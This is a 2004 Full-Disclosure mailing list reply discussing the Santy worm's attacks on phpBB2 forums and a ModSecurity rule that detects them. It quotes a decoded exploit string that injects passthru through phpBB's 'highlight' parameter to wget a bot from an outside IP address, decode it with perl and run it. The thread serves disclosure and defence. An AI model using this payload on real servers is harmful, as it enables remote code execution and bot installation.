RE: RE: Worm hitting PHPbb2 Forums

[Paul Laudanski <zx () castlecops com>]

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 
chunks."

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html